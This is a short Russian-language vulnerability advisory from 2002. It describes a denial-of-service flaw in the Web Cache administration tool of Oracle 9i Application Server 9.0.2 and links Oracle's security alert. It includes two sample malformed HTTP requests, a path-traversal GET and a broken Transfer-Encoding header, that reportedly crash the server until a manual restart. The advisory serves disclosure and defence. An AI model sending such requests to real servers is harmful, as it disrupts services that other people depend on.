DoS в Oracle 9i Application Server Web Cache Administration Tool

Дата публикации:
08.10.2002
Всего просмотров:
845
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Oracle 9i Application Server (9iAS) позволяет удаленное администрирование через модуль Web доступа.

Злонамеренный сконструированный запрос к модулю Web Administration, приведет к аварийному завершению работы сервера. Для восстановления работы потребуется ручная перезагрузка.

Пример:

GET /../ HTTP/1.1 
host: hostname 
<ENTER> 
<ENTER> 

GET /example.html/ HTTP/1.1 
host: host name 
Transfer Encoding 
<ENTER> 
<ENTER>
Уязвимость обнаружена в Oracle Oracle 9i Application Server 9.0.2

Ссылки: http://otn.oracle.com/deploy/security/pdf/2002alert43rev1.pdf
или введите имя

CAPTCHA